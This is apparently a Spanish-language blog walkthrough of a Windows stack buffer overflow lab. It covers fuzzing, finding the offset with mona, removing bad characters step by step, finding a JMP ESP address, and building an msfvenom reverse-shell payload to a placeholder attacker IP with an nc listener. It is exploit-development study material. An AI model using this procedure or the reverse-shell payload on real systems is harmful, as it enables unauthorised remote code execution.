Pasted image 20210616070801.png

python3 fuzzer.py

Pasted image 20210616073344.png

/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 1100

Pasted image 20210616073300.png

Copiamos esto a payload en el exploit.py

Reiniciamos app

python3 exploit.py

!mona findmsp -distance 1700

Pasted image 20210616074054.png

Offset es 1274

Ahora cambiamos el offset en el archivo de exploit.py al numero offset Y tambien rtn le ponemos un valor de "BBBB"

Pasted image 20210616074852.png

!mona bytearray -b "\x00"

Pasted image 20210616075900.png

python3 bad_characters.py

Lo que sale del comando arriba lo ponemos en payload

Pasted image 20210616075552.png

!mona compare -f C:\mona\oscp\bytearray.bin -a <address>

Pasted image 20210616080421.png

Los bad chars son los siguientes:

00 11 12 40 41 5f 60 b8 b9 ee ef

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210616080421.png

Quitamos el 11 del payload en el script

Pasted image 20210616081300.png

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210616081943.png

Ahora bad chars son Ahora los bad chars serian \x00\x11\x40

Quitamos el x40 del payload en el script

Pasted image 20210616082155.png

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210616082718.png

Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f

Quitamos el x5f del payload en el script

Pasted image 20210616082855.png

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210616083338.png

Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8

Pasted image 20210616083557.png

Quitamos el xb8 del payload en el script

Pasted image 20210616083728.png

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210616083913.png

Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8\xee

Pasted image 20210616084057.png

Quitamos el xee del payload en el script

Pasted image 20210616084208.png

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210616084208.png

Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8\xee

!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"

Pasted image 20210616084738.png

Agarramos el numero 62501203

cambiamos el rtn y iniciamos payload='' esto en exploit.py

Pasted image 20210616091057.png

msfvenom -p windows/shell\_reverse\_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -f c

Agregamos a lo que sale en el comando anterior y ese valor es de payload en el exploit.py

padding = "\x90" * 16

nc -lvnp 4444

Pasted image 20210616091005.png

blog

copyright©2022 Cu3rv0x all rights reserved